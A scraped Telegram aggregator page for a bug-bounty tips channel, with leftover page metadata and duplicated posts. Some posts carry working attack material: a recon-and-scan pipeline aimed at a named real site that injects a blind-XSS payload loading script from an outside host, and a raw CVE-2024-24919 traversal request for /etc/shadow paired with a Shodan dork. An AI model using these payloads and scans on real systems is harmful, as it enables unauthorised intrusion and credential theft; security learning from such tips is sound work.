en
Feedback
Bug Bounty

Bug Bounty

Open in Telegram

Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •

Show more
9 446
Subscribers
No data24 hours
-37 days
-6030 days
Posts Archive
' -parameters\n\nsubzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl\n\npython3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers \"User-Agent: GoogleBot\\nCookie: SESSION=Hacked\"\n\nnuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors\n\nnuclei -list ~/vaitor/subdomains_alive.txt -tags cve,osint,tech\n\ncat allurls.txt | gf lfi | nuclei -tags lfi\ncat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect\n\n@lostsec \nwatch recent video that i uploaded in youtube ❤️","datePublished":"2024-05-30T06:06:50Z","dateModified":"2024-05-30T06:06:50Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/962","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/962","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/962","headline":"CSRF Notes 📝 https://caramel-calcium-f39.notion.site/Cross-Site-Request-Forgery-e033d88440c8435b9cb2460bb53dc…","articleBody":"CSRF Notes 📝 \nhttps://caramel-calcium-f39.notion.site/Cross-Site-Request-Forgery-e033d88440c8435b9cb2460bb53dc0bf","datePublished":"2024-05-27T02:35:46Z","dateModified":"2024-05-27T02:35:46Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/961","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/961","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/961","headline":"🚨LazyEgg - Hunting JS Files🚨 💥Command: waybackurls target | grep '\\.js$' | awk -F '?' '{print $1}' | sort -u…","articleBody":"🚨LazyEgg - Hunting JS Files🚨\n\n💥Command: waybackurls target | grep '\\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e \"\\ntarget : {}\\n\" && python lazyegg[.]py \"{}\" --js_urls --domains --ips'\n\n🔗Download https://lnkd.in/gnRJ5mzw","datePublished":"2024-05-26T14:02:53Z","dateModified":"2024-05-26T14:02:53Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/960","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/960","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/960","headline":"https://medium.com/@yousefmoh15/how-i-got-rce-in-one-of-bugcrowds-public-programs-5725c8dc46ce","articleBody":"https://medium.com/@yousefmoh15/how-i-got-rce-in-one-of-bugcrowds-public-programs-5725c8dc46ce","datePublished":"2024-05-25T13:37:09Z","dateModified":"2024-05-25T13:37:09Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/959","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/959","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/959","headline":"[Part I] Bug Bounty Hunting for IDORs and Access Control Violations","articleBody":"[Part I] Bug Bounty Hunting for IDORs and Access Control Violations","datePublished":"2024-05-25T05:11:53Z","dateModified":"2024-05-25T05:11:53Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0,"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-05-17T17:39:55Z"}}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/958","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/958","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/958","headline":"Bug Bounty","datePublished":"2024-05-24T15:32:30Z","dateModified":"2024-05-24T15:32:30Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/957","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/957","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/957","headline":"I am posting the bug images intentionally to showcase you that Low fruit bug hunting is not at all hard, but…","articleBody":"I am posting the bug images intentionally to showcase you that Low fruit bug hunting is not at all hard, but if you do continue enjoying it probably you'll missed something big. These are small happiness which lure you to engage in more automation. Avoid it! And do manual testing! Best Of Luck Everyone👾","datePublished":"2024-05-24T15:32:14Z","dateModified":"2024-05-24T15:32:14Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/956","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/956","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/956","headline":"#bugbountytips: How I got $500, for bypassing the waf (Bypassing 405 method not allowed). Step To Reproduce:…","articleBody":"#bugbountytips:\nHow I got $500, for bypassing the waf (Bypassing 405 method not allowed).\n\nStep To Reproduce:\n\na7madn1 found admin portal let say admin.a7madn1.com\n\n• it have just login page. No any sign up option.\n\n• 3-I opened my Burpsuite, and tried to create account with Post method.\n\n• The server return 405 Method not allowed.\n\n• I Changed content_type header from application/json to application/x-www-form-urlencoded\n\n• I tried to send the request.\n\n• I was successfully bypassed the Amazon server and return some Sensitive information.\n\n• I tried to create an account because I was able to send Post request without any 405, but I was no very lucky to doing that.\n\n• The internal team recognized my vulnerability and transferred it to Medium.\n\n👨‍🏫 Lesson we learned? 🗣\n\nAlways try everything, and try to bypass the waf for any method. always you will learn new information, Don’t forget Content_type header for bypassing the waf.\nHappy hacking 🙏","datePublished":"2024-05-24T10:43:11Z","dateModified":"2024-05-24T10:43:11Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/955","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/955","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/955","headline":"Bug Bounty","datePublished":"2024-05-22T16:00:42Z","dateModified":"2024-05-22T16:00:42Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/954","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/954","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/954","headline":"🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave revie…","articleBody":"🚨 Source Code Review 🚨\n\nFunctionality Type - Product Review Section\n\n• 🛒 A shopping site lets users leave reviews on products. Reviews are displayed on the product page.\n\nIdentify Vulnerabilities in this code. How would you exploit it?\n\nPost Your Answers here : https://x.com/RadhaSec/status/1792625547740135741","datePublished":"2024-05-20T18:39:17Z","dateModified":"2024-05-20T18:39:17Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/953","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/953","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/953","headline":"Hey Guys! 👋 Do we have anyone with expertise in SIEM and SOAR? 🔍💡 Urgent Need: We are looking for a Certified…","articleBody":"Hey Guys! 👋\n\nDo we have anyone with expertise in SIEM and SOAR? 🔍💡\n\nUrgent Need: We are looking for a Certified Trainer, preferably with Google Chronicle SIEM and SOAR course completion. 🎓📊\n\nTraining Details : \n\n• Technology: Yara L 🔧\n• Mode of Training: Virtual 💻\n• Target Month: June 📆\n• Number of Participants: 15 👥\n• Course Outline: Please share from your end 📚\n\nRequest you for the following Details:\n\n• Updated Trainer/Consultant profile 📝\n• Commercials per day 💰\n• Training Duration ⏳\n• Table of Contents (TOC): To be shared from your end 📚\n• Available time slots for a technical call 📅\n• Available dates for training 🗓\n• Number of batches delivered training till date in total 👥\n• Client names where training was delivered 🏢\n\nLab Setup Details:\n\n• System requirement (Hardware) 💻\n• Software required for this training 🖥\n• Availability of required software from your end 📦\n\nPlease DM at @anukulhexx @RootxAbhishek with your Resume.","datePublished":"2024-05-20T12:31:45Z","dateModified":"2024-05-20T12:31:45Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/952","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/952","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/952","headline":"Bug Bounty","datePublished":"2024-05-20T00:56:47Z","dateModified":"2024-05-20T00:56:47Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/951","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/951","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/951","headline":"Can you guys help us to boost this channel https://t.me/boost/bugbountyresources","articleBody":"Can you guys help us to boost this channel \n\nhttps://t.me/boost/bugbountyresources","datePublished":"2024-05-19T06:02:02Z","dateModified":"2024-05-19T06:02:02Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/950","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/950","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/950","headline":"#bugbountytips: always see if there a captcha in your Target.then try to know how the captcha it's work and t…","articleBody":"#bugbountytips:\nalways see if there a captcha in your Target.then try to know how the captcha it's work and try to bypass it you don't know maybe you got it😉\n\n#Note:\nMany programs don't accept this kind of vulnerability. So you must search just in authentication endpoint","datePublished":"2024-05-19T05:59:19Z","dateModified":"2024-05-19T05:59:19Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/949","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/949","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/949","headline":"🚨GraphQL Test Cases Checklist🚨 🔗Link- https://anmolksachan.github.io/graphql/","articleBody":"🚨GraphQL Test Cases Checklist🚨\n\n🔗Link- https://anmolksachan.github.io/graphql/","datePublished":"2024-05-19T04:09:39Z","dateModified":"2024-05-19T04:09:39Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/948","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/948","mainEntityOfPage":"https://telemetr.io/en/channels/1549967532-bugbountyresources/posts/948","headline":"I always love listen this song while hunting and it's gave me lots of relaxation and relif from burn out. Hop…","articleBody":"I always love listen this song while hunting and it's gave me lots of relaxation and relif from burn out.\n\nHope you'll like it too - Radhe Govind","datePublished":"2024-05-18T02:23:54Z","dateModified":"2024-05-18T02:23:54Z","author":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"publisher":{"@type":"Organization","name":"Bug Bounty","url":"https://telemetr.io/en/channels/1549967532-bugbountyresources","image":"https://img.tlmtr.io/c/1GTvmk/6213198612536606049?ty=x"},"commentCount":0}}]}
Top 25 SSRF parameters 📃 • ?dest={target} • ?redirect={target} • ?uri={target} • ?path={target} • ?continue={target} • ?url={target} • ?window={target} • ?next={target} • ?data={target} • ?reference={target} • ?site={target}

For this vulnerability, just type shodan title:"Check Point" ssl:"target" CVE-2024-24919 POST /clients/MyCRL HTTP/1.1 host: t
For this vulnerability, just type shodan title:"Check Point" ssl:"target" CVE-2024-24919 POST /clients/MyCRL HTTP/1.1 host: target Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #SSLVPN #BugBounty

Bug Hunting methodoloy part 2 :)
Bug Hunting methodoloy part 2 :)

Bug Hunting methodology part 2 by Lostsec :) ---------------------------------------------------------------------------- subfinder -d viator.com -all -recursive > subdomain.txt cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config" cat allurls.txt | grep -E "\.js$" >> js.txt cat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30 dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked" nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors nuclei -list ~/vaitor/subdomains_alive.txt -tags cve,osint,tech cat allurls.txt | gf lfi | nuclei -tags lfi cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect @lostsec watch recent video that i uploaded in youtube ❤️

🚨LazyEgg - Hunting JS Files🚨 💥Command: waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{}
🚨LazyEgg - Hunting JS Files🚨 💥Command: waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips' 🔗Download https://lnkd.in/gnRJ5mzw

Repost from N/a
[Part I] Bug Bounty Hunting for IDORs and Access Control Violations

photo content

I am posting the bug images intentionally to showcase you that Low fruit bug hunting is not at all hard, but if you do continue enjoying it probably you'll missed something big. These are small happiness which lure you to engage in more automation. Avoid it! And do manual testing! Best Of Luck Everyone👾

#bugbountytips: How I got $500, for bypassing the waf (Bypassing 405 method not allowed). Step To Reproduce: a7madn1 found ad
#bugbountytips: How I got $500, for bypassing the waf (Bypassing 405 method not allowed). Step To Reproduce: a7madn1 found admin portal let say admin.a7madn1.com • it have just login page. No any sign up option. • 3-I opened my Burpsuite, and tried to create account with Post method. • The server return 405 Method not allowed. • I Changed content_type header from application/json to application/x-www-form-urlencoded • I tried to send the request. • I was successfully bypassed the Amazon server and return some Sensitive information. • I tried to create an account because I was able to send Post request without any 405, but I was no very lucky to doing that. • The internal team recognized my vulnerability and transferred it to Medium.
👨‍🏫 Lesson we learned? 🗣
Always try everything, and try to bypass the waf for any method. always you will learn new information, Don’t forget Content_type header for bypassing the waf. Happy hacking 🙏

TOP_100_Vulnerabilities_Step_by_Step_Guide_Handbook.pdf6.57 KB

🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave reviews on product
🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave reviews on products. Reviews are displayed on the product page. Identify Vulnerabilities in this code. How would you exploit it? Post Your Answers here : https://x.com/RadhaSec/status/1792625547740135741

Hey Guys! 👋 Do we have anyone with expertise in SIEM and SOAR? 🔍💡 Urgent Need: We are looking for a Certified Trainer, preferably with Google Chronicle SIEM and SOAR course completion. 🎓📊 Training Details : Technology: Yara L 🔧 • Mode of Training: Virtual 💻 • Target Month: June 📆 • Number of Participants: 15 👥 • Course Outline: Please share from your end 📚 Request you for the following Details: • Updated Trainer/Consultant profile 📝 • Commercials per day 💰 • Training Duration ⏳ • Table of Contents (TOC): To be shared from your end 📚 • Available time slots for a technical call 📅 • Available dates for training 🗓 • Number of batches delivered training till date in total 👥 • Client names where training was delivered 🏢 Lab Setup Details: • System requirement (Hardware) 💻 • Software required for this training 🖥 • Availability of required software from your end 📦 Please DM at @anukulhexx @RootxAbhishek with your Resume.

🍁🔰Do you think XSS vulnerabilities are becoming more or less prevalent in modern web applications? 🍂🌿
Anonymous voting

Can you guys help us to boost this channel https://t.me/boost/bugbountyresources

#bugbountytips: always see if there a captcha in your Target.then try to know how the captcha it's work and try to bypass it you don't know maybe you got it😉 #Note: Many programs don't accept this kind of vulnerability. So you must search just in authentication endpoint

🚨GraphQL Test Cases Checklist🚨 🔗Link- https://anmolksachan.github.io/graphql/
🚨GraphQL Test Cases Checklist🚨 🔗Link- https://anmolksachan.github.io/graphql/

I always love listen this song while hunting and it's gave me lots of relaxation and relif from burn out. Hope you'll like it too - Radhe Govind